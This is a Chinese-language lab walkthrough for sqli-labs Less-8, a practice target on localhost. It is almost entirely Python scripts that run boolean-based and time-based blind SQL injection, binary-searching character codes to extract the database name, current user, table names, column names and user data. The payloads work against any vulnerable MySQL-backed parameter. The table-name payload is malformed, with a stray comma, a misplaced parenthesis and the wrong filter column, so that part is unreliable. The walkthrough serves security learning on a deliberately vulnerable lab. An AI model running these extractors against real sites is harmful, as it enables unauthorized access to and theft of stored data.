在sqli-labs中的第8题无回显可以尝试盲注的手法获取数据
发现页面加载了3秒左右可以进行盲注
布尔盲注数据库名
import requests
def inject_database(url):
dataname=''
for i in range(1,15):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
path = "id=1' and ascii(substr(database(),%d, 1)) > %d-- " % (i,mid)
r = requests.get(url,path)
if "You are in..........." in r.text:
low = mid + 1
else :
high = mid
mid = (low + high) // 2
if mid == 32:
break
dataname += chr(mid)
print(dataname)
if __name__=='__main__':
url = 'http://127.0.0.1:8989/Less-8/'
inject_database(url)结果
用时间盲注出用户名
import requests
import time
def inject_user(url):
user=''
for i in range(1,15):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = f"1' and if(ascii(substr(user(), {i}, 1)) > {mid},sleep(1),0)-- "
res = {"id":payload}
start_time = time.time()
r = requests.get(url,params=res)
if (time.time() - start_time)>1:
# 匹配成功
low = mid + 1
else :
high = mid
mid = (low + high) // 2
if mid == 32:
break
user += chr(mid)
print(user)
if __name__=='__main__':
url = 'http://127.0.0.1:8989/Less-8/'
inject_user(url)
结果
用盲注的方式查询表、列、具体数据
if __name__ == '__main__':
url = 'http://127.0.0.1:8989/Less-8/'
# 获取当前数据库名
database_name = inject_database(url)
print(f"Database name: {database_name}")
# 获取数据库中的表名
tables = inject_tables(url, database_name)
print(f"Tables in database '{database_name}': {tables}")
# 获取指定表中的列名
table_name = 'users' # 替换为目标表名
columns = inject_columns(url, table_name)
print(f"Columns in table '{table_name}': {columns}")
# 获取指定表中特定列的数据
column_name = 'username' # 替换为目标列名
data = inject_data(url, table_name, column_name)
print(f"Data in column '{column_name}' of table '{table_name}': {data}")时间检测模块
# 发送请求并检查响应时间
def check_time_injection(url, payload):
res = {"id": payload}
start_time = time.time()
r = requests.get(url, params=res)
elapsed_time = time.time() - start_time
return elapsed_time > 1 # 假设延迟超过1秒表示查询成功数据库模块
# 获取当前数据库名
def inject_database(url):
dataname=''
for i in range(1,15):
low = 32
high = 128
mid = (low + high) // 2
while low < high:
payload = "1' and ascii(substr(database(),%d, 1)) > %d-- " % (i,mid)
res = {"id":payload}
r = requests.get(url,params=res)
if "You are in..........." in r.text:
low = mid + 1
else :
high = mid
mid = (low + high) // 2
if mid == 32:
break
dataname += chr(mid)
print(dataname)
return dataname数据库中表名模块
# 获取指定数据库中的表名
def inject_tables(url, database_name):
tables = []
table_index = 0
while True:
table_index += 1
table_name = ''
for i in range(1, 20): # 假设表名长度不超过20字符
low = 32
high = 128
while low < high:
mid = (low + high) // 2
payload = f",' and if(ascii(substr(select table_name from information_schema.tables where table_name='{database_name}' limit {table_index-1},1),{i},1 > {mid},sleep(1),0)-- "
if check_time_injection(url, payload):
low = mid + 1
else:
high = mid
if low == 32: # ASCII码32为空格,通常表示结束
break
table_name += chr(low)
print(f"Current table name: {table_name}")
if table_name:
tables.append(table_name)
print(f"Found table: {table_name}")
else:
break
return tables列名模块
def inject_columns(url, table_name):
columns = []
column_index = 0
while True:
column_index += 1
column_name = ''
for i in range(1, 20): # 假设列名长度不超过20字符
low = 32
high = 128
while low < high:
mid = (low + high) // 2
payload = f"1' and if(ascii(substr((select column_name from information_schema.columns where table_name='{table_name}' limit {column_index-1},1),{i},1)) > {mid},sleep(1),0) -- "
if check_time_injection(url, payload):
low = mid + 1
else:
high = mid
if low == 32: # ASCII码32为空格,通常表示结束
break
column_name += chr(low)
print(f"Current column name: {column_name}")
if column_name:
columns.append(column_name)
print(f"Found column: {column_name}")
else:
break
return columns指定查询数据模块
# 获取指定表中特定列的数据
def inject_data(url, table_name, column_name):
data = []
row_index = 0
while True:
row_index += 1
row_value = ''
for i in range(1, 20): # 假设数据长度不超过20字符
low = 32
high = 128
while low < high:
mid = (low + high) // 2
payload = f"1' and if(ascii(substr((select {column_name} from {table_name} limit {row_index-1},1),{i},1)) > {mid},sleep(1),0) -- "
if check_time_injection(url, payload):
low = mid + 1
else:
high = mid
if low == 32: # ASCII码32为空格,通常表示结束
break
row_value += chr(low)
print(f"Current row value: {row_value}")
if row_value:
data.append(row_value)
print(f"Found data: {row_value}")
else:
break
return data结果
数据库
列
user
